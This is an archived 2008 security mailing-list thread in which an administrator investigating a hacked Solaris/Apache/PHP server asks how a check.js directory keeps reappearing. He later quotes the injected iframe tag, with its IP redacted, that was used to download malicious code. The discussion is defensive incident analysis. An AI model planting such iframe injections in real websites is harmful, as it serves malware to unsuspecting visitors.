WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: PHP Security

From: "Greg Song" <bigrootno1 () gmail com>
Date: Wed, 19 Mar 2008 14:02:45 +0900
It includes iframe code. and also it was used to download malicious code.

iframe code is as below

iframe src="http://[IP ADDRESS]/help.htm]

Of cause there are other files.

I guess it started from 'check.js'.


Greg.


2008/3/19, Eric Marden <security () xentek net>:

Are you saying that check.js was used in the attack? Does this file
call any remote files?


Eric Marden
xentek: enlightened internet solutions
http://xentek.net/

On Mar 17, 2008, at 7:58 PM, Greg Song wrote:

Hi all
Thesedays I'm analyzing the solarys system that using apache web
server and php. Of cause it hacked.
I could not find reason of some situation that the specified directory
are created over and over(it includes check.js)
Weblog record as below

xxx.xxx.xxx.xxx GET "/XXX/ahibix/check.js

Some pages can upload the file but it didn't work when I uploaded
some php file.
I'm wondering how it makes some directories.
Any suggestin,ideas.
Thanks all

----------------------------------------------------------------------
---
Sponsored by: Watchfire
Methodologies & Tools for Web Application Security Assessment
With the rapid rise in the number and types of security threats,
web application security assessments should be considered a crucial
phase in the development of any web application. What methodology
should be followed? What tools can accelerate the assessment
process? Download this Whitepaper today!

https://www.watchfire.com/securearea/whitepapers.aspx?
id=70170000000940F
----------------------------------------------------------------------
---




-------------------------------------------------------------------------
Sponsored by: Watchfire
Methodologies & Tools for Web Application Security Assessment
With the rapid rise in the number and types of security threats, web application security assessments should be 
considered a crucial phase in the development of any web application. What methodology should be followed? What tools 
can accelerate the assessment process? Download this Whitepaper today!

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------




-------------------------------------------------------------------------
Sponsored by: Watchfire 
Methodologies & Tools for Web Application Security Assessment 
With the rapid rise in the number and types of security threats, web application security assessments should be 
considered a crucial phase in the development of any web application. What methodology should be followed? What tools 
can accelerate the assessment process? Download this Whitepaper today! 

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: